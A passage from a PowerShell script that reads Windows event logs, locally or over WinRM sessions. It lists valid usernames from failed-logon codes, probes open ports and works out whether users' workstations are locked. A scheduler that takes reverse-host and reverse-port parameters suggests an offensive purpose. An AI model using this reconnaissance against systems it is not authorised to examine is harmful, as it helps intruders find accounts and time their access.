$accountName=([wmi]"win32_SID.SID='$userSID'").AccountName 678 | $userBelongToGroups=Invoke-Command -ScriptBlock {net user $accountName /domain | Select-String "Global Group"} 679 | $userComment=Invoke-Command -ScriptBlock {net user $accountName /domain | Select-String -Pattern "^comment"} 680 | Write-Output "Username> $accountName" 681 | Write-Host "[!] User is currently belong to> $userBelongToGroups" -ForegroundColor Green 682 | Write-Host "$userComment" -ForegroundColor Red 683 | Write-Output "`n" 684 | 685 | } 686 | } 687 | 688 | $event400_600_array=@(400,600) 689 | foreach($event400_600 in $event400_600_array) 690 | { 691 | if($event400_600 -eq 400) 692 | { 693 | 694 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (400) - Windows PowerShell" 695 | Write-Output "`n" 696 | } 697 | else 698 | { 699 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (600) - Windows PowerShell" 700 | Write-Output "`n" 701 | } 702 | 703 | try 704 | { 705 | $get400_600=Get-EventLog -Newest $using:newest -InstanceId $event400_600 -LogName "Windows Powershell" | select TimeGenerated,@{Name="HostApplication";Expression={$_.ReplacementStrings[2]}} | select TimeGenerated,HostApplication 706 | if(($get400_600 | Measure-Object).count -gt 0) 707 | { 708 | $timeGenerated=($get400_600.TimeGenerated).DateTime 709 | $hostApplication=($get400_600.HostApplication | findstr -i "HostApplication") 710 | $engineVersion=($get400_600.HostApplication | findstr -i "EngineVersion") 711 | #$hostPSVersion=Get-Host | Select Version 712 | 713 | 714 | for($c=0;$c -lt $get400_600.length;$c++) 715 | { 716 | if($hostApplication[$c].Split("=") -ne "") 717 | { 718 | Write-Host $timeGenerated[$c] 719 | #Write-Host "Host PowerShell: "$hostPSVersion.Version 720 | Write-Host $hostApplication[$c].Split("=")[1] 721 | if($engineVersion[$c].split("=")[1] -eq "") 722 | { 723 | Write-Host "Command PS Version: -" 724 | } 725 | else 726 | { 727 | Write-Host "Command PS Version:"$engineVersion[$c].split("=")[1] 728 | } 729 | Write-Output "`n" 730 | 731 | } 732 | 733 | } 734 | } 735 | } 736 | catch 737 | { 738 | <# Try/Catch Event 400/600#> 739 | } 740 | 741 | } 742 | 743 | 744 | $event500_501_array=@(500,501) 745 | foreach($event500_501 in $event500_501_array) 746 | { 747 | if($event500_501 -eq 500) 748 | { 749 | 750 | $event500_501=500 751 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (500) - Windows PowerShell" 752 | Write-Output "`n" 753 | } 754 | else 755 | { 756 | $event500_501=501 757 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (501) - Windows PowerShell" 758 | Write-Output "`n" 759 | } 760 | 761 | try 762 | { 763 | $get500_501=Get-EventLog -Newest $newest -InstanceId $event500_501 -LogName "Windows Powershell" | select TimeGenerated,PSComputerName,@{Name="Command";Expression={$_.ReplacementStrings[2]}} | select TimeGenerated,PSComputerName,Command 764 | if(($get500_501 | Measure-Object).count -gt 0) 765 | { 766 | $timeGenerated=($get500_501 | Select TimeGenerated) 767 | #$psComputerName=$get500_501.PsComputerName 768 | $commandPath=($get500_501 | Select Command) | format-List | findstr -i "CommandPath" 769 | $commandName=($get500_501 | Select Command) | format-List | findstr -i "CommandName" 770 | $commandType=($get500_501 | Select Command) | format-List | findstr -i "CommandType" 771 | $commandLine=($get500_501 | Select Command) | format-List | findstr -i "CommandLine" 772 | $engineVersion=($get500_501 | Select Command) | format-list | findstr -i "EngineVersion" 773 | #$hostPSVersion=Get-Host | Select Version 774 | 775 | 776 | for($c=0;$c -lt $get500_501.length;$c++) 777 | { 778 | if($commandLine[$c].Split("=") -ne "") 779 | { 780 | Write-Host $timeGenerated[$c] 781 | #Write-Host $psComputerName[$c] 782 | if($commandName[$c].split("=")[1] -eq ""){Write-Host "CommandName: -"}else{Write-Host "CommandName: "$commandName[$c].split("=")[1].Trim(" ")} 783 | if($commandType[$c].split("=")[1] -eq ""){Write-Host "CommandType: -"}else{Write-Host "CommandType: "$commandType[$c].split("=")[1].Trim(" ")} 784 | if($commandPath[$c].split("=")[1] -eq ""){Write-Host "CommandPath: -"}else{Write-Host "CommandPath: "$commandPath[$c].split("=")[1].Trim(" ")} 785 | if($commandLine[$c].split("=")[1] -eq ""){Write-Host "CommandLine: -"}else{Write-Host "CommandLine: "($commandLine[$c].split("=")[1]).Trim(" ")} 786 | if($engineVersion[$c].split("=")[1] -eq ""){Write-Host "Command PS Version: -"}else{Write-Host "Command PS Version:"$engineVersion[$c].split("=")[1]} 787 | Write-Output "`n" 788 | 789 | } 790 | 791 | } 792 | } 793 | 794 | 795 | } 796 | catch 797 | { 798 | <# Try/Catch event 500/501#> 799 | } 800 | 801 | } 802 | 803 | 804 | }<#### All event logs query just finished #####> 805 | 806 | #Display unique accounts for event 4624,4625,4776 807 | if($using:users) 808 | { 809 | 810 | if($using:eventID -eq 4624) 811 | { 812 | 813 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4624 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property @{Label="Usernames";Expression={$_.ReplacementStrings[5]}} | Group-Object 'Usernames' | Format-Table @{L='Valid Usernames';E={$_.Name}} 814 | #Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4625 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property @{Label="Username";Expression={$_.ReplacementStrings[5]}},@{Label="Status";Expression={if($_.ReplacementStrings[9] -eq "0xC0000064") { "Username doesn't exist!"} elseif ($_.ReplacementStrings[9] -eq "0xC000006A") {"Username is correct but the Password is wrong!"} elseif ($_.ReplacementStrings[9] -eq "0xC0000072") {"User is currently disabled!"} elseif ($_.ReplacementStrings[9] -eq "0xC0000234") {"User is currently Locked Out!"} }} | Group-Object Username,Status | Format-Table -Property Name 815 | 816 | } 817 | elseif($using:eventID -eq 4625) 818 | { 819 | 820 | 821 | #Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4625 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property @{Label="Username";Expression={$_.ReplacementStrings[5]}},@{Label="Status";Expression={if($_.ReplacementStrings[9] -eq "0xC0000064") { "Username doesn't exist!"} elseif ($_.ReplacementStrings[9] -eq "0xC000006A") {"Username is correct but the Password is wrong!"} elseif ($_.ReplacementStrings[9] -eq "0xC0000072") {"User is currently disabled!"} elseif ($_.ReplacementStrings[9] -eq "0xC0000234") {"User is currently Locked Out!"} }} | Group-Object Username,Status | Format-Table -Property Name 822 | 823 | #Print only valid usernames 824 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4625 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property @{Label="Username";Expression={$_.ReplacementStrings[5]}},@{Label="Status";Expression={if($_.ReplacementStrings[9] -eq "0xC000006A") {"Username is correct but the Password is wrong!"} }} | Where-Object {$_.Status -eq "Username is correct but the Password is wrong!"} | Group-Object Username | Format-Table @{L='Valid Usernames';E={$_.Name}} 825 | } 826 | else 827 | { 828 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4776 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property @{Label="Username";Expression={$_.ReplacementStrings[1]}},@{Label="Error Type";Expression={$_.ReplacementStrings[3]}},@{Label="Status";Expression={if($_.ReplacementStrings[3] -eq "0xC0000064") { "Username doesn't exist!"} elseif($_.ReplacementStrings[3] -eq "0x0") { "Successful Authentication"} elseif ($_.ReplacementStrings[3] -eq "0xC000006A") {"Username is correct but the Password is wrong!"} elseif ($_.ReplacementStrings[3] -eq "0xC0000072") {"User is currently disabled!"} elseif ($_.ReplacementStrings[3] -eq "0xC0000234") {"User is currently Locked Out!"} }} | Group-Object Username,'Error Type',Status | Format-Table @{L='User information';E={$_.Name}} 829 | } 830 | 831 | 832 | 833 | } 834 | 835 | } 836 | 837 | 838 | 839 | 840 | function testConnectivity($ip,$port) 841 | { 842 | 843 | 844 | if(Test-Connection -BufferSize 32 -Count 1 -Quiet -ComputerName $ip) 845 | { 846 | try 847 | { 848 | $socket=new-object System.Net.Sockets.TcpClient($ip,$port) 849 | } 850 | catch 851 | { 852 | <# Nothing Here#> 853 | Write-Output "Port $port is closed!" 854 | } 855 | } 856 | 857 | if($socket.Connected) 858 | { 859 | 860 | 861 | Write-Output "Port $port is open!!" 862 | $socket.close() 863 | } 864 | 865 | 866 | } 867 | 868 | 869 | <# https://sion-it.co.uk/tech/powershell/loop-until-a-certain-time/ #> 870 | function timeBomb 871 | { 872 | [CmdletBinding()] 873 | Param([string]$task,[datetime]$at,[int]$loop,[datetime]$stoptime,[string]$newest,[string]$ip,[string]$reverseHost,[int]$reversePort) 874 | 875 | $currentTime=Get-Date 876 | [datetime]$p=$currentTime 877 | 878 | if($task -eq "now") 879 | { 880 | 881 | if($ip -match "127.0.0.1") 882 | { 883 | Invoke-Command -ScriptBlock ${function:checkLogOf} -ArgumentList $newest 884 | } 885 | else 886 | { 887 | 888 | $winrmUniqueSessionsID=Get-PSSession | Get-Unique 889 | for($x=0;$x -le ($winrmUniqueSessionsID).length;$x++) 890 | { 891 | #Check if WinRM Table is not null 892 | if($winrmUniqueSessionsID[$x]) 893 | { 894 | Invoke-Command -Session (Get-PSSession -Id $winrmUniqueSessionsID[$x].id) -ScriptBlock ${function:checkLogOf} -ArgumentList $newest 895 | } 896 | } 897 | 898 | 899 | } 900 | 901 | } 902 | elseif($task -eq "once") 903 | { 904 | 905 | 906 | $remaingMinutes=($at-(Get-Date)).Minutes 907 | $remaingSeconds=($at-(Get-Date)).Seconds 908 | 909 | 910 | if($ip -match '127.0.0.1') 911 | { 912 | 913 | Write-Host "[+] Task started at>"(Get-Date) -ForegroundColor Yellow 914 | Write-Host "[+] Left $remaingMinutes minute(s) for your task" -ForegroundColor Green 915 | Start-Sleep -Seconds (60*$remaingMinutes) 916 | Invoke-Command -ScriptBlock ${function:checkLogOf} -ArgumentList $newest 917 | 918 | } 919 | else 920 | { 921 | 922 | #Get-PSSession 923 | #[int]$winrmSessionsID=Read-Host -Prompt "Give session id to retrieve open WinRM connections" 924 | Write-Output "`n" 925 | Write-Host "[+] Task started at>"(Get-Date) -ForegroundColor Yellow 926 | Write-Host "[+] Left $remaingMinutes minute(s) for your task" -ForegroundColor Green 927 | Start-Sleep -Seconds (60*$remaingMinutes) 928 | $winrmUniqueSessionsID=Get-PSSession | Get-Unique 929 | for($x=0;$x -le ($winrmUniqueSessionsID).length;$x++) 930 | { 931 | if($winrmUniqueSessionsID[$x]) 932 | { 933 | 934 | Invoke-Command -Session (Get-PSSession -Id $winrmUniqueSessionsID[$x].id) -ScriptBlock ${function:checkLogOf} -ArgumentList $newest 935 | } 936 | 937 | } 938 | } 939 | 940 | } 941 | elseif($task -eq "trigger") 942 | { 943 | 944 | if($at -and $loop -and $stoptime) 945 | { 946 | [datetime]$TimeStart = $at 947 | [datetime]$TimeEnd = $stoptime.addminutes($loop) 948 | Write-Host "Start Time: $TimeStart" 949 | write-host "End Time: $TimeEnd" 950 | 951 | $now=Get-Date 952 | while($now -lt $at) 953 | { 954 | $now=Get-Date 955 | Start-Sleep -Seconds 10 956 | } 957 | #setup loop 958 | 959 | 960 | do 961 | { 962 | $TimeNow = Get-Date 963 | if ($TimeNow -ge $TimeEnd) 964 | { 965 | Write-host "It's time to finish." 966 | } 967 | else 968 | { 969 | 970 | if($ip -match '127.0.0.1') 971 | { 972 | 973 | Write-Host "[+] Task started at>"(Get-Date) -ForegroundColor Yellow 974 | Write-Host "[+] Left $remaingMinutes minute(s) for your task" -ForegroundColor Green 975 | Start-Sleep -Seconds (60*$remaingMinutes) 976 | Invoke-Command -ScriptBlock ${function:checkLogOf} -ArgumentList $newest,$pythonconnectback 977 | 978 | } 979 | else 980 | { 981 | 982 | #Get-PSSession 983 | #[int]$winrmSessionsID=Read-Host -Prompt "Give session id to retrieve open WinRM connections" 984 | Write-Output "`n" 985 | Write-Host "[+] Task started at>"(Get-Date) -ForegroundColor Yellow 986 | Write-Host "[+] Left $remaingMinutes minute(s) for your task" -ForegroundColor Green 987 | Start-Sleep -Seconds (60*$remaingMinutes) 988 | $winrmUniqueSessionsID=Get-PSSession | Get-Unique 989 | for($x=0;$x -le ($winrmUniqueSessionsID).length;$x++) 990 | { 991 | if($winrmUniqueSessionsID[$x]) 992 | { 993 | Invoke-Command -Session (Get-PSSession -Id $winrmUniqueSessionsID[$x].id) -ScriptBlock ${function:checkLogOf} -ArgumentList $newest 994 | } 995 | 996 | } 997 | } 998 | 999 | 1000 | } 1001 | 1002 | $delay=$loop*(60/1) #convert minutes to seconds 1003 | Start-Sleep -Seconds $delay 1004 | } 1005 | until ($TimeNow -ge $TimeEnd) 1006 | 1007 | 1008 | 1009 | } 1010 | else 1011 | { 1012 | Write-Host "[-] You need at/loop/stoptime flags" -ForegroundColor Yellow 1013 | } 1014 | 1015 | 1016 | } 1017 | 1018 | } 1019 | 1020 | 1021 | function checkLogOf($newest) 1022 | { 1023 | 1024 | 1025 | #[array]$hostUsers= Get-ChildItem -Path "c:\users" | %{$_.Name} 1026 | Write-Host "[!] " -ForegroundColor Green -NoNewline; Write-Host "Enumerating users ..." 1027 | [array]$hostUsers=Get-ChildItem 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\ProfileList' | ForEach-Object { $_.GetValue('ProfileImagePath') } | Where-Object {$_ -match "c:\\users"} | Where-Object {$_ -match "c:\\users"} | foreach {( $_ -split "c:\\users\\")[1]} 1028 | Write-Host "[!] " -ForegroundColor Green -NoNewline; Write-Host "Doing some checks ..." 1029 | $auditPolPath="c:\windows\temp\Auditpol.csv" 1030 | 1031 | #check if auditpol.csv exists, if yes remove it 1032 | if([System.IO.File]::Exists($auditPolPath)) 1033 | { 1034 | Remove-Item -Path $auditPolPath 1035 | $exportPolicy=Invoke-Command -ScriptBlock {auditpol /backup /file:$auditPolPath} 1036 | #$exportPolicy=Invoke-Expression -Command "c:\windows\system32\cmd.exe /c auditpol /backup /file:$auditPolPath" 1037 | } 1038 | else 1039 | { 1040 | $exportPolicy=Invoke-Command -ScriptBlock {auditpol /backup /file:$auditPolPath} 1041 | 1042 | 1043 | } 1044 | $readPolicyContents=Get-content $auditPolPath 1045 | $policyContentsArray=($readPolicyContents | Select-String "Account Lockout") -split "," 1046 | #Validate that events 4800/4801, 4802/4803 exists 1047 | if(($policyContentsArray | Select-String -Pattern "Success|Failure")) 1048 | { 1049 | #Lockout Policy exists 1050 | Write-Host "[+] " -foregroundcolor Green -Nonewline;Write-Host "Lockout policy found ..." 1051 | Write-Output "`n" 1052 | } 1053 | else 1054 | { 1055 | Write-Host "[-] " -foregroundcolor Yellow -Nonewline; Write-Host "Lockout Policy not found ..." 1056 | Write-Output "`n" 1057 | } 1058 | 1059 | 1060 | #check if events 4800/4801, 4802/4803 exists, if yes add to eventArray 1061 | $eventArray = New-Object System.Collections.ArrayList 1062 | 1063 | for($usercounter=0;$usercounter -lt $hostUsers.Length;$usercounter++) 1064 | { 1065 | $currentUser=$hostUsers[$usercounter] 1066 | try 1067 | { 1068 | $results4800_1=Get-EventLog -LogName Security -Instanceid 4800 -ErrorAction stop | Where {$_.message -match "Account Name:\s*$currentUser"} 1069 | if($results4800_1) 1070 | { 1071 | #check if $eventArray contains 4800, if not then added 1072 | if(!$eventArray.Contains(4800)) 1073 | { 1074 | $eventArray.add(4800) | Out-Null 1075 | } 1076 | } 1077 | 1078 | } 1079 | catch 1080 | { 1081 | Write-Host "[-] " -ForegroundColor Red -NoNewline; Write-Host "No logs found for user $currentUser / eventID 4800/4801" 1082 | } 1083 | 1084 | try 1085 | { 1086 | $results4802_3=Get-EventLog -LogName Security -Instanceid 4802 -ErrorAction Stop| Where {$_.message -match "Account Name:\s*$currentUser"} 1087 | 1088 | if($results4802_3) 1089 | { 1090 | #check if $eventArray 4802, if not then added 1091 | if(!$eventArray.contains(4802)) 1092 | { 1093 | $eventArray.add(4802) | Out-Null 1094 | } 1095 | } 1096 | 1097 | } 1098 | catch 1099 | { 1100 | Write-Host "[-] " -ForegroundColor Red -Nonewline; Write-Host "No logs found for user $currentUser / eventID 4802/4803" 1101 | write-output "`n" 1102 | } 1103 | 1104 | 1105 | 1106 | 1107 | } 1108 | 1109 | 1110 | $events = New-Object System.Collections.ArrayList 1111 | 1112 | 1113 | #In try block check if "newest" number is more than existing log files. 1114 | #try 1115 | #{ 1116 | for($usercounter=0;$usercounter -lt $hostUsers.Length;$usercounter++) 1117 | {#1 1118 | 1119 | 1120 | $currentUser=$hostUsers[$usercounter] 1121 | #-after ([datetime]::Today) 1122 | try 1123 | { 1124 | 1125 | $lastloggof=Get-EventLog -LogName Security -Instanceid 4647 -newest $newest -ErrorAction Stop | Where {$_.message -match "Account Name:\s*$currentUser"} | Select -Property TimeGenerated,MachineName,@{Name="Username";Expression={$_.ReplacementStrings[1]}} | Select-Object -first 1 1126 | #$lastloggof 1127 | if(!$lastloggof) 1128 | { 1129 | $lastloggof="" 1130 | } 1131 | 1132 | } 1133 | catch 1134 | { 1135 | Write-Host "[-] " -ForegroundColor Red -Nonewline; Write-Host "No logs found for user $currentUser / eventID 4647" 1136 | 1137 | } 1138 | 1139 | try 1140 | { 1141 | 1142 | $lastloggon=Get-EventLog -LogName Security -Instanceid 4624 -newest $newest -ErrorAction stop | Where {($_.message -match "Account Name:\s*$currentUser") -and ($_.message -notmatch "Security ID:\s*S-1-0-0")} | Select -Property TimeGenerated,MachineName,@{Name="Username";Expression={$_.ReplacementStrings[5]}} | Select-Object -first 1 1143 | if(!$lastloggon) 1144 | { 1145 | $lastloggon="" 1146 | } 1147 | 1148 | } 1149 | catch 1150 | { 1151 | 1152 | Write-Host "[-] " -ForegroundColor Red -NoNewline; Write-Host "logs found for user $currentUser / eventID 4624" 1153 | } 1154 | 1155 | 1156 | 1157 | #check if lastloggof,lastloggon is null before converting to datetime 1158 | if(($lastloggof -and $lastloggon) -ne "") 1159 | {#2 1160 | #Convert to datetime 1161 | [datetime]$lastloggof1=$lastloggof.TimeGenerated 1162 | [datetime]$lastloggon1=$lastloggon.TimeGenerated 1163 | $userlogofStateCalc=$lastloggon1-$lastloggof1 1164 | 1165 | #Check if user is logged on 1166 | [float]$logoftotalMilliseconds=$userlogofStateCalc.TotalMilliseconds 1167 | #Write-Host "[!] " -ForegroundColor Green -NoNewline;Write-Host "Checking Logof events ..." 1168 | if($logoftotalMilliseconds -ge 0) 1169 | {#3 1170 | 1171 | 1172 | #Write-Host "[!] User $currentUser is logged on" -ForegroundColor Yellow 1173 | $events.Clear() 1174 | for($x=0;$x -lt $eventArray.count;$x++) 1175 | {#3.5 1176 | 1177 | 1178 | ($events.Add((Get-EventLog -LogName Security -Instanceid $eventArray[$x] -newest $newest | Where {$_.message -match "Account Name:\s*$currentUser"} | Select -Property TimeGenerated,MachineName,@{Name="Username";Expression={$_.ReplacementStrings[1]}} | Select-Object -first 1).TimeGenerated)) | Out-Null 1179 | 1180 | ($events.Add((Get-EventLog -LogName Security -Instanceid ($eventArray[$x]+1) -newest $newest | Where {($_.message -match "Account Name:\s*$currentUser") -and ($_.message -notmatch "Security ID:\s*S-1-0-0")} | Select -Property TimeGenerated,MachineName,@{Name="Username";Expression={$_.ReplacementStrings[5]}} | Select-Object -first 1).TimeGenerated)) | Out-Null 1181 | 1182 | 1183 | #check if the event is 4800/4801 or 4802/4803 1184 | #################################################################################################################################################################### 1185 | if($eventArray[$x] -eq 4800) 1186 | {#4 1187 | 1188 | $userlockoutStateCalc2=$events[3]-$events[2] 1189 | [float]$lockouttotalMilliseconds2=$userlockoutStateCalc2.TotalMilliseconds 1190 | 1191 | if($lockouttotalMilliseconds2 -ge 0) 1192 | {#5 1193 | 1194 | #write-Host "[-] The screen saver is dismissed -"$eventArray[$x]"/"($eventArray[$x]+1)"event IDs" -ForegroundColor Yellow 1195 | #write-Host "[-] The screen saver is dismissed" -ForegroundColor Yellow 1196 | <#SCREENSAVER OUTPUT / NOTHING HERE#> 1197 | 1198 | 1199 | $userlockoutStateCalc=$events[1]-$events[0] 1200 | [float]$lockouttotalMilliseconds=$userlockoutStateCalc.TotalMilliseconds 1201 | 1202 | if($lockouttotalMilliseconds -ge 0) 1203 | {#6 1204 | 1205 | #write-Host "[-] The workstation is unlocked -"$eventArray[$x]"/"($eventArray[$x]+1)"event IDs" -ForegroundColor Yellow 1206 | #write-Host "[-] The workstation is unlocked" -ForegroundColor Yellow 1207 | 1208 | #4779->A session was disconnected from a Window Station 1209 | try 1210 | { 1211 | $getLast4779 = Get-EventLog -LogName Security -Instanceid 4779 -newest $newest -ErrorAction Stop | Where {$_.message -match "Account Name:\s*$currentUser"} | Select -property MachineName,TimeGenerated,@{Name="Username";Expression={$_.ReplacementStrings[0]}},@{Name="Domain";Expression={$_.ReplacementStrings[1]}} | Select-Object -first 1 1212 | } 1213 | catch 1214 | { 1215 | try 1216 | { 1217 | $getLast4779_count=(Get-EventLog -LogName Security -Instanceid 4779 -ErrorAction Stop).Count 1218 | } 1219 | catch 1220 | { 1221 | $getLast4779_count = 0 1222 | } 1223 | Write-Host "[-] " -ForegroundColor Red -NoNewline;Write-Host "You enter $newest but eventID-4779 has $getLast4779_count entries" 1224 | Write-Output "`n" 1225 | } 1226 | 1227 | #4768->A Kerberos authentication ticket (TGT) was requested 1228 | try 1229 | { 1230 | $getLast4768 = Get-EventLog -LogName Security -Instanceid 4768 -newest $newest -ErrorAction Stop| Where {$_.message -match "Account Name:\s*$currentUser"} | Select -property MachineName,TimeGenerated,@{Name="Username";Expression={$_.ReplacementStrings[0]}},@{Name="SID";Expression={$_.ReplacementStrings[2]}},@{Name="Domain";Expression={$_.ReplacementStrings[1]}},@{Name="Client Address";Expression={$_.ReplacementStrings[9]}},@{Name="Client Port";Expression={$_.ReplacementStrings[10]}} | Select-Object -first 1 1231 | } 1232 | catch 1233 | { 1234 | try 1235 | { 1236 | $getLast4768_count=(Get-EventLog -LogName Security -Instanceid 4768 -ErrorAction Stop).Count 1237 | } 1238 | catch 1239 | { 1240 | $getLast4768_count = 0 1241 | } 1242 | Write-Host "[-] " -ForegroundColor Red -NoNewline;Write-Host "You enter $newest but eventID-4768 has $getLast4768_count entries" 1243 | Write-Output "`n" 1244 | } 1245 | 1246 | #4634->An account was logged off 1247 | try 1248 | { 1249 | $getLast4634 = Get-EventLog -LogName Security -Instanceid 4634 -newest $newest -ErrorAction Stop | Where {$_.message -match "Account Name:\s*$currentUser"} | Select -property MachineName,TimeGenerated,@{Name="Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="SID";Expression={$_.ReplacementStrings[0]}},@{Name="Domain";Expression={$_.ReplacementStrings[2]}} | Select-Object -First 1 1250 | } 1251 | catch 1252 | { 1253 | try 1254 | { 1255 | $getLast4634_count = (Get-EventLog -LogName Security -Instanceid 4634 -ErrorAction Stop).Count 1256 | } 1257 | catch 1258 | { 1259 | $getLast4634_count = 0 1260 | } 1261 | Write-Host "[-] " -ForegroundColor Red -Nonewline; Write-Host "You enter $newest but eventID-4634 has $getLast4634_count entries" 1262 | Write-Output "`n" 1263 | } 1264 | 1265 | #$getLast4672 = Get-EventLog -LogName Security -Instanceid 4672 -newest $newest | Where {$_.message -match "Account Name:\s*$currentUser"} | Select -property MachineName,TimeGenerated,@{Name="Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="SID";Expression={$_.ReplacementStrings[0]}},@{Name="Domain";Expression={$_.ReplacementStrings[2]}} | select-object -First 1 1266 | #$t4672=$getLast4672.TimeGenerated 1267 | 1268 | #Calculator 1269 | if($getLast4768.TimeGenerated) 1270 | { 1271 | $t4768=$getLast4768.TimeGenerated 1272 | } 1273 | else 1274 | { 1275 | [datetime]$t4768 = 0 1276 | } 1277 | 1278 | if($getLast4634.TimeGenerated) 1279 | { 1280 | 1281 | $t4634=$getLast4634.TimeGenerated 1282 | } 1283 | else 1284 | { 1285 | [datetime]$t4634 = 0 1286 | } 1287 | 1288 | if($getLast4779.TimeGenerated) 1289 | { 1290 | $t4779=$getLast4779.TimeGenerated 1291 | } 1292 | else 1293 | { 1294 | [datetime]$t4779=0 1295 | } 1296 | 1297 | 1298 | $tmpTime = $t4768-$t4779 1299 | $tmpTime2 = $t4768 - $t4634 1300 | 1301 | #Get domain name from the event4779, else use wmi 1302 | if($getLast4779.Domain) 1303 | { 1304 | $domainName=$getLast4779.Domain 1305 | } 1306 | else 1307 | { 1308 | $domainName=(Get-WmiObject Win32_ComputerSystem).Domain 1309 | } 1310 | 1311 | 1312 | if($tmpTime.TotalMilliseconds -ge 0) 1313 | {#7 1314 | Write-Host "[-] The Workstation is unlocked | User $domainName\$currentUser is in!" -ForegroundColor Yellow 1315 | #Write-Output "`n" 1316 | } 1317 | else 1318 | { 1319 | Write-Host "[+] The Workstation is locked | User $domainName\$currentUser is in NOT in!" -ForegroundColor Green 1320 | #Write-Output "`n" 1321 | }#7 1322 | 1323 | } 1324 | else 1325 | { 1326 | 1327 | 1328 | #4779->A session was disconnected from a Window Station 1329 | try 1330 | { 1331 | $getLast4779 = Get-EventLog -LogName Security -Instanceid 4779 -newest $newest -ErrorAction Stop| Where {$_.message -match "Account Name:\s*$currentUser"} | Select -property MachineName,TimeGenerated,@{Name="Username";Expression={$_.ReplacementStrings[0]}},@{Name="Domain";Expression={$_.ReplacementStrings[1]}} | Select-Object -first 1 1332 | } 1333 | catch 1334 | { 1335 | try 1336 | { 1337 | $getLast4779_count = (Get-EventLog -LogName Security -Instanceid 4779 -ErrorAction Stop).Count 1338 | } 1339 | catch 1340 | { 1341 | $getLast4779_count = 0 1342 | } 1343 | Write-Host "[-] " -Foregroundcolor Red -Nonewline; Write-Host "You enter $newest but eventID-4779 has $getLast4779_count entries" 1344 | Write-Output "`n" 1345 | } 1346 | 1347 | #4768->A Kerberos authentication ticket (TGT) was requested 1348 | try 1349 | { 1350 | $getLast4768 = Get-EventLog -LogName Security -Instanceid 4768 -newest $newest -ErrorAction Stop| Where {$_.message -match "Account Name:\s*$currentUser"} | Select -property MachineName,TimeGenerated,@{Name="Username";Expression={$_.ReplacementStrings[0]}},@{Name="SID";Expression={$_.ReplacementStrings[2]}},@{Name="Domain";Expression={$_.ReplacementStrings[1]}},@{Name="Client Address";Expression={$_.ReplacementStrings[9]}},@{Name="Client Port";Expression={$_.ReplacementStrings[10]}} | Select-Object -first 1 1351 | } 1352 | catch 1353 | { 1354 | try 1355 | { 1356 | $getLast4768_count = (Get-EventLog -LogName Security -Instanceid 4768 -ErrorAction Stop).Count 1357 | } 1358 | catch 1359 | { 1360 | $getLast4768_count = 0 1361 | } 1362 | 1363 | Write-Host "[-] " -ForegroundColor Red -NoNewline; Write-Host "You enter $newest but eventID-4768 has $getLast4768_count entries" 1364 | Write-Output "`n" 1365 | } 1366 | 1367 | #4634->An account was logged off 1368 | try 1369 | { 1370 | $getLast4634 = Get-EventLog -LogName Security -Instanceid 4634 -newest $newest -ErrorAction Stop | Where {$_.message -match "Account Name:\s*$currentUser"} | Select -property MachineName,TimeGenerated,@{Name="Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="SID";Expression={$_.ReplacementStrings[0]}},@{Name="Domain";Expression={$_.ReplacementStrings[2]}} | Select-Object -First 1 1371 | } 1372 | catch 1373 | { 1374 | try 1375 | { 1376 | $getLast4634_count = (Get-EventLog -LogName Security -Instanceid 4634 -ErrorAction Stop).Count 1377 | } 1378 | catch 1379 | { 1380 | $getLast4634_count = 0 1381 | } 1382 | 1383 | Write-Host "[-] " -foregroundcolor Red -Nonewline;Write-Host "You enter $newest but eventID-4634 has $getLast4634_count entries" 1384 | Write-Output "`n" 1385 | 1386 | } 1387 | 1388 | #4800->The workstation was locked 1389 | try 1390 | { 1391 | $getLast4800 = Get-EventLog -LogName Security -Instanceid 4800 -newest $newest -ErrorAction Stop | Where {$_.message -match "Account Name:\s*$currentUser"} | Select -Property TimeGenerated,MachineName,@{Name="Username";Expression={$_.ReplacementStrings[1]}} | Select-Object -first 1 1392 | } 1393 | catch 1394 | { 1395 | try 1396 | { 1397 | $getLast4800_count = (Get-EventLog -LogName Security -Instanceid 4800 -ErrorAction Stop).Count 1398 | } 1399 | catch 1400 | { 1401 | $getLast4800_count = 0 1402 | } 1403 | 1404 | Write-Host "[-] " -foregroundColor Red -Nonewline;Write-Host "You enter $newest but eventID-4800 has $getLast4800_count entries" 1405 | Write-Output "`n" 1406 | } 1407 | 1408 | #4672->Special privileges assigned to new logon 1409 | #$getLast4672 = Get-EventLog -LogName Security -Instanceid 4672 -newest $newest | Where {$_.message -match "Account Name:\s*$currentUser"} | Select -property MachineName,TimeGenerated,@{Name="Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="SID";Expression={$_.ReplacementStrings[0]}},@{Name="Domain";Expression={$_.ReplacementStrings[2]}} | select-object -First 1 1410 | #$t4672=$getLast4672.TimeGenerated 1411 | 1412 | #Calculator, Check if any of the event TimeGenerated is null 1413 | 1414 | if($getLast4768.TimeGenerated) 1415 | { 1416 | $t4768=$getLast4768.TimeGenerated 1417 | } 1418 | else 1419 | { 1420 | [datetime]$t4768=0 1421 | 1422 | } 1423 | 1424 | if($getLast4779.TimeGenerated) 1425 | { 1426 | $t4779=$getLast4779.TimeGenerated 1427 | } 1428 | else 1429 | { 1430 | [datetime]$t4779=0 1431 | 1432 | } 1433 | 1434 | if($getLast4634.TimeGenerated) 1435 | { 1436 | $t4634=$getLast4634.TimeGenerated 1437 | } 1438 | else 1439 | { 1440 | [datetime]$t4634=0 1441 | 1442 | } 1443 | 1444 | if($getLast4800.TimeGenerated) 1445 | { 1446 | $t4800=$getLast4800.TimeGenerated 1447 | } 1448 | else 1449 | { 1450 | [datetime]$t4800=0 1451 | 1452 | } 1453 | 